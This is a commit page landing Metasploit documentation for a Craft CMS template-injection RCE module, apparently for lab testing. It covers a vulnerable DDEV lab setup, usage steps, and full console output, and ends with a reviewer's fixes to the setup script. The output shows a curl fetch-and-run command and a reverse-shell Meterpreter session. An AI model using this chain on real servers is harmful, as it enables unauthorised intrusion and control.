
Commit 34f3957

Land #19772, adding module for CraftCMS FTP template exploit
2 parents 1939257 + 2254a1f commit 34f3957

2 files changed

+496
-0
lines changed

Lines changed: 275 additions & 0 deletions
@@ -0,0 +1,275 @@
1+
## Vulnerable Application
2+
3+
This Metasploit module exploits a Remote Code Execution vulnerability in **Craft CMS**.
4+
5+
The vulnerability lies in improper handling of Twig templates, which can be exploited
6+
to inject and execute arbitrary PHP code on the server via crafted HTTP requests.
7+
8+
---
9+
10+
### Affected Versions
11+
12+
- **5.x Series**: `>= 5.0.0-RC1`, `< 5.5.2`
13+
- **4.x Series**: `>= 4.0.0-RC1`, `< 4.13.2`
14+
- **3.x Series**: `>= 3.0.0`, `< 3.9.14`
15+
16+
---
17+
18+
### Setting Up a Vulnerable Lab
19+
20+
To test this exploit, follow these steps to set up a vulnerable Craft CMS environment.
21+
22+
#### Docker Setup
23+
24+
Install a specific vulnerable version of Craft CMS:
25+
26+
```bash
27+
mkdir exploit-craft && \
28+
cd exploit-craft && \
29+
# Configure DDEV (https://ddev.com/) project for Craft CMS \
30+
ddev config \
31+
--project-type=craftcms \
32+
--docroot=web \
33+
--create-docroot \
34+
--php-version="8.2" \
35+
--database="mysql:8.0" \
36+
--nodejs-version="20" && \
37+
# Create the DDEV project
38+
ddev start -y && \
39+
# Create Craft CMS with the specified version
40+
ddev composer create -y --no-scripts --no-interaction "craftcms/craft:5.0.0" && \
41+
# Install a vulnerable Craft CMS version
42+
ddev composer require "craftcms/cms:5.5.0" \
43+
--no-scripts \
44+
--no-interaction --with-all-dependencies && \
45+
# Set the security key for Craft CMS
46+
ddev craft setup/security-key && \
47+
# Install Craft CMS
48+
ddev craft install/craft \
49+
--username=admin \
50+
--password=password123 \
51+
52+
--site-name=Testsite \
53+
--language=en \
54+
--site-url='$DDEV_PRIMARY_URL' && \
55+
# Enable register_argc_argv for PHP
56+
mkdir -p .ddev/php/ && \
57+
echo "register_argc_argv = On" > .ddev/php/php.ini && \
58+
ddev restart && \
59+
# Launch the project
60+
echo 'Setup complete. Launching the project.' && \
61+
ddev launch
62+
```
63+
64+
---
65+
66+
## Verification Steps
67+
68+
1. Start the vulnerable Craft CMS instance using the steps above.
69+
2. Launch `msfconsole`.
70+
3. Use the module: `use exploit/linux/http/craftcms_ftp_template`.
71+
4. Set `RHOSTS` to the target Craft CMS instance.
72+
5. Configure additional options (`TARGETURI`, `SSL`, etc.) as needed.
73+
6. Execute the exploit with the `run` command.
74+
7. If successful, the module will execute the payload on the target.
75+
76+
---
77+
78+
## Options
79+
No option
80+
81+
## Scenarios
82+
83+
#### Successful Exploitation Against Craft CMS 5.5.0
84+
85+
**Setup**:
86+
87+
- Local Craft CMS instance with a vulnerable version (e.g., `5.5.0`).
88+
- Metasploit Framework.
89+
90+
**Steps**:
91+
92+
To successfully exploit the Craft CMS vulnerability using this Metasploit module, follow these steps:
93+
94+
1. Start `msfconsole`:
95+
```bash
96+
msfconsole
97+
```
98+
99+
2. Load the module:
100+
```bash
101+
use exploit/linux/http/craftcms_ftp_template
102+
```
103+
104+
3. Set the `RHOSTS` option to the target Craft CMS instance, for example:
105+
```bash
106+
set RHOSTS exploit-craft.ddev.site
107+
```
108+
109+
4. Configure other necessary options such as `TARGETURI`, `SSL`, and `RPORT` if required. By default:
110+
- `RPORT` is set to `80`.
111+
- `TARGETURI` is set to `/`.
112+
113+
5. Set the payload for exploitation. For example:
114+
```bash
115+
set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
116+
```
117+
118+
6. Set the local listener address and port:
119+
```bash
120+
set LHOST 192.168.1.36
121+
set LPORT 4444
122+
```
123+
124+
7. Optionally, customize FTP-related settings like `SRVPORT` and `FETCH_URIPATH` if needed:
125+
```bash
126+
set SRVPORT 9090
127+
set FETCH_SRVPORT 8081
128+
set FETCH_URIPATH /custom_payload_path
129+
```
130+
131+
8. Run the exploit:
132+
```bash
133+
exploit
134+
```
135+
136+
**Expected Results**:
137+
138+
If the target is vulnerable, the module will successfully execute the payload and open a session, such as a Meterpreter shell:
139+
140+
```bash
141+
msf6 exploit(linux/http/craftcms_ftp_template) > options
142+
143+
Module options (exploit/linux/http/craftcms_ftp_template):
144+
145+
Name Current Setting Required Description
146+
---- --------------- -------- -----------
147+
PASVPORT 0 no The local PASV data port to listen on (0 is random)
148+
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
149+
RHOSTS exploit-craft.ddev.site yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metaspl
150+
oit.html
151+
RPORT 80 yes The target port (TCP)
152+
SRVHOST 192.168.1.36 yes The local host or network interface to listen on. This must be an address on the local machine
153+
or 0.0.0.0 to listen on all addresses.
154+
SRVPORT 9090 yes The local port to listen on.
155+
SSL false no Negotiate SSL for incoming connections
156+
SSLCert no Path to a custom SSL certificate (default is randomly generated)
157+
VHOST no HTTP server virtual host
158+
159+
160+
Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
161+
162+
Name Current Setting Required Description
163+
---- --------------- -------- -----------
164+
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
165+
FETCH_DELETE false yes Attempt to delete the binary after execution
166+
FETCH_FILENAME QnXFYebbb no Name to use on remote system when storing payload; cannot contain spaces or slashes
167+
FETCH_SRVHOST no Local IP to use for serving payload
168+
FETCH_SRVPORT 8081 yes Local port to use for serving payload
169+
FETCH_URIPATH no Local URI to use for serving payload
170+
FETCH_WRITABLE_DIR yes Remote writable dir to store payload; cannot contain spaces
171+
LHOST 192.168.1.36 yes The listen address (an interface may be specified)
172+
LPORT 4444 yes The listen port
173+
174+
175+
Exploit target:
176+
177+
Id Name
178+
-- ----
179+
0 Unix/Linux Command Shell
180+
181+
182+
183+
View the full module info with the info, or info -d command.
184+
185+
msf6 exploit(linux/http/craftcms_ftp_template) > exploit
186+
[*] Command to run on remote host: curl -so ./jlVAsfWu http://192.168.1.36:8081/LoPlnjEpeOexZNVppn6cAA;chmod +x ./jlVAsfWu;./jlVAsfWu&
187+
[*] Exploit running as background job 57.
188+
[*] Exploit completed, but no session was created.
189+
msf6 exploit(linux/http/craftcms_ftp_template) >
190+
[*] Fetch handler listening on 192.168.1.36:8081
191+
[*] HTTP server started
192+
[*] Adding resource /LoPlnjEpeOexZNVppn6cAA
193+
[*] Started reverse TCP handler on 192.168.1.36:4444
194+
[*] Running automatic check ("set AutoCheck false" to disable)
195+
[*] Performing vulnerability check...
196+
[+] The target is vulnerable.
197+
[*] Starting FTP service...
198+
[*] Started service listener on 192.168.1.36:9090
199+
[*] FTP server started on 192.168.1.36:9090
200+
[*] Sending HTTP request to trigger the payload...
201+
[*] Triggering HTTP request...
202+
[*] -> 220 FTP Server Ready
203+
[*] on_client_command_user
204+
[*] -> 331 Username ok, send password.
205+
[*] on_client_command_pass
206+
[*] -> 230 Login successful.
207+
[*] on_client_command_cwd
208+
[*] -> 250 "/default" is current directory.
209+
[*] on_client_command_type
210+
[*] -> 200 Type set to: Binary.
211+
[*] on_client_command_size
212+
[*] -> 550 /default is not retrievable.
213+
[*] on_client_command_mdtm
214+
[*] -> 550 /default is not retrievable.
215+
[*] -> 220 FTP Server Ready
216+
[*] on_client_command_user
217+
[*] -> 331 Username ok, send password.
218+
[*] on_client_command_pass
219+
[*] -> 230 Login successful.
220+
[*] on_client_command_cwd
221+
[*] -> 550 Not a directory
222+
[*] on_client_command_type
223+
[*] -> 200 Type set to: Binary.
224+
[*] on_client_command_size
225+
[*] -> 213 154
226+
[*] on_client_command_mdtm
227+
[*] -> 213 20250110170738
228+
[*] -> 220 FTP Server Ready
229+
[*] on_client_command_user
230+
[*] -> 331 Username ok, send password.
231+
[*] on_client_command_pass
232+
[*] -> 230 Login successful.
233+
[*] on_client_command_cwd
234+
[*] -> 550 Not a directory
235+
[*] on_client_command_type
236+
[*] -> 200 Type set to: Binary.
237+
[*] on_client_command_size
238+
[*] -> 213 154
239+
[*] on_client_command_mdtm
240+
[*] -> 213 20250110170738
241+
[*] -> 220 FTP Server Ready
242+
[*] on_client_command_user
243+
[*] -> 331 Username ok, send password.
244+
[*] on_client_command_pass
245+
[*] -> 230 Login successful.
246+
[*] on_client_command_type
247+
[*] -> 200 Type set to: Binary.
248+
[*] on_client_command_size
249+
[*] -> 213 154
250+
[*] on_client_command_epsv
251+
[*] -> 502 EPSV command not implemented.
252+
[*] on_client_command_retr
253+
[*] -> 150 Opening data connection for /default/index.twig
254+
[*] -> 226 Transfer complete.
255+
[*] on_client_command_quit
256+
[*] -> 221 Goodbye.
257+
[*] Client 172.26.0.2 requested /LoPlnjEpeOexZNVppn6cAA
258+
[*] Sending payload to 172.26.0.2 (curl/7.88.1)
259+
[*] Transmitting intermediate stager...(126 bytes)
260+
[*] Sending stage (3045380 bytes) to 172.26.0.2
261+
[*] Meterpreter session 14 opened (192.168.1.36:4444 -> 172.26.0.2:59546) at 2025-01-10 17:07:39 +0100
262+
263+
msf6 exploit(linux/http/craftcms_ftp_template) > sessions 14
264+
[*] Starting interaction with 14...
265+
meterpreter > sysinfo
266+
Computer : 172.26.0.2
267+
OS : Debian 12.8 (Linux 5.15.0-130-generic)
268+
Architecture : x64
269+
BuildTuple : x86_64-linux-musl
270+
Meterpreter : x64/linux
271+
meterpreter >
272+
[*] Waiting for FTP client connections...
273+
[*] Shutting down FTP service...
274+
[*] Server stopped.
275+
```
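Review bot: the empty line between `--password=password123 \` and `--site-name=Testsite \` in the Docker setup block breaks the backslash continuation of the `ddev craft install/craft` command. A backslash followed by an empty line ends the command, so the install runs with only `--username` and `--password`, `--site-name=Testsite` is then executed as a separate command and fails, and because it is the head of the remaining `&&` chain the `register_argc_argv` php.ini step, `ddev restart` and `ddev launch` never run. Delete the blank line. Two documentation points in the same file: the "## Options" section says "No option", yet the `options` output lower down shows module-specific settings (`PASVPORT`, `SRVHOST`, `SRVPORT`) that should be described there, and the `register_argc_argv = On` requirement appears only as a comment inside the lab script and belongs under "Vulnerable Application" as a stated precondition. Finally, step 7 of the scenario calls `FETCH_SRVPORT` and `FETCH_URIPATH` "FTP-related settings", but the `options` output lists them under the fetch payload, so only `SRVPORT` and `PASVPORT` configure the module's FTP server; reword the step to separate the two.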
